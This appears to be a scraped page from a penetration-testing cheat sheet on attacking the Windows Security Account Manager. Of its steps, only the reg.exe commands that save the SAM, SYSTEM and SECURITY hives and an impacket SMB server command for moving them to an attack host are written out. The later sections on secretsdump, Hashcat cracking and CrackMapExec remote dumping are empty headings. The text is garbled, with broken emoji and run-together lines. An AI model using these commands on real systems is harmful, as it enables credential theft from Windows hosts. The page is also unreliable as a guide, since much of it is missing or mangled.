Attacking SAM (Security Account Manager)
Copying SAM Registry Hives
Hive
Description
Using reg.exe Save Registry Hives (Run as Administrator):
reg.exe Save Registry Hives (Run as Administrator):reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.saveTransferring the Hives to the Attack Host
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/Dumping Hashes with secretsdump.py
secretsdump.pyπ§Ύ Sample Output:
Cracking NT Hashes with Hashcat
β
Sample Cracked Output:
Remote Dumping with CrackMapExec
Dump LSA Secrets Remotely:
Dump SAM Hashes Remotely:
π§ Key Takeaways
Last updated